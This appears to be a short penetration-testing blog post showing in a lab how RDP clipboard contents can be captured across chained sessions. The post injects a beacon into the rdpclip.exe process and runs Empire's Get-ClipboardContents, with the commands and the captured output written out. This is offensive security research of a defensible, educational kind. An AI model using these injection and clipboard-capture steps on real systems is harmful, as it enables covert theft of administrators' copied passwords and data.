This is just a quick post to demonstrate some interesting aspects of the Remote Desktop Clipboard Monitor.
Vincent Yiu already published details of a great attack called RDPInception, which allows an adversary to “swim” back up an RDP session if drive sharing is enabled. Drive sharing is not enabled by default but clipboard monitoring is, making it particularly potent and prevelant.
I set up a little lab to test to what extent clipboard contents are exposed.
The idea is that both DMZ1 and DMZ2 are only accessed via an RDP “Jump Box” on the main LAN. Based on my experience, it’s very common for sysadmins to manage these “segregated” networks from production environments via RDP.
The Get-ClipboardContents module from Empire allows you to capture the clipboard of a user. If an admin RDP’s into DMZ2 from the LAN, we can inject this capability into one of their processes and see what they’re copying/pasting within DMZ2.
But as it happens, the scope of what we can read is not limited to DMZ2.
We can guess that someone is using RDP based on an established incoming connection on port 3389, and a process synonymous with RDP:
TCP 192.168.2.200:3389 192.168.0.200:63340 ESTABLISHED
PID PPID Name Arch Session User --- ---- ---- ---- ------- ----- 1084 680 ShellExperienceHost.exe x64 3 DMZ2\rasta 2248 1096 explorer.exe x64 3 DMZ2\rasta 3280 680 SearchUI.exe x64 3 DMZ2\rasta 3332 680 RuntimeBroker.exe x64 3 DMZ2\rasta 3652 1232 sihost.exe x64 3 DMZ2\rasta 3668 584 svchost.exe x64 3 DMZ2\rasta 3836 1232 taskhostw.exe x64 3 DMZ2\rasta 3924 888 rdpclip.exe x64 3 DMZ2\rasta 4368 680 dllhost.exe x64 3 DMZ2\rasta
Inject a beacon into
rdpclip, then import and run
beacon> inject 3924 x64 smb beacon> powershell-import D:\Tools\Get-ClipboardContents.ps1 beacon> powershell Get-ClipboardContents -PollInterval 1
I was first able to verify that I could capture the clipboard from inside the DMZ2 RDP session.
[+] received output: === 09/06/2018:13:12:26:91 === hello from dmz2
Now it started getting interesting… When RDP’d into DMZ1 from the LAN whilst still connected to DMZ2, it turns out we can capture the DMZ1 clipboard from within DMZ2.
[+] received output: === 09/06/2018:13:19:11:09 === hello from dmz1
Not only that, but also from both the Jump Box and the source workstation on the LAN.
[+] received output: === 09/06/2018:13:20:40:50 === hello from the lan jump box [+] received output: === 09/06/2018:13:21:34:25 === and hello from the lan workstation!